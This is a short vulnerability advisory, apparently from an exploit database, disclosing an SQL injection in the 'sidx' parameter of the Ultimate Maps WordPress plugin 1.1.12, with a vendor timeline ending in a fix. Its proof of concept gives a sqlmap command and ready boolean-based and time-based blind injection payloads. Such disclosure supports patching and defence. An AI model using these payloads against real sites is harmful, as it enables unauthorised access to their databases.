# Exploit Title: WordPress Plugin Supsystic Ultimate Maps 1.1.12 - 'sidx' SQL injection # Date: 24/07/2020 # Exploit Author: Erik David Martin # Vendor Homepage: https://supsystic.com/ # Software Link: https://downloads.wordpress.org/plugin/ultimate-maps-by-supsystic.1.1.12.zip # Category: Web Application # Version: 1.1.12 # Tested on: 16.04.6 LTS / WordPress 5.4.2 # 25/07 2020: Vendor notified # 27/07 2020: Vendor requested detailed information # 27/07 2020: Information provided # 07/08 2020: Nudged vendor. No reply # 22/08 2020: Nudged vendor. No reply # 04/10 2020: Nudged vendor. No reply # 29/11 2020: WordPress Plugin Security team contacted # 09/12 2020: Vulnerability fixed # 1. Description The GET parameter "sidx" does not sanitize user input when searching for existing maps. # 2. Proof of Concept (PoC) Use ZAP/Burp to capture the web request when searching for existing maps and save it to request.txt Referer: http://192.168.0.49/wp-admin/admin.php?page=ultimate-maps-supsystic sqlmap -r request.txt --dbms=mysql -p sidx Parameter: sidx (GET) Type: boolean-based blind Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=(SELECT (CASE WHEN (7084=7084) THEN 0x6964 ELSE (SELECT 3932 UNION SELECT 2499) END))&sord=desc Type: time-based blind Payload: mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search[text_like]=t&_search=false&nd=1595781611306&rows=10&page=1&sidx=id AND (SELECT 9735 FROM (SELECT(SLEEP(5)))AJAb)&sord=desc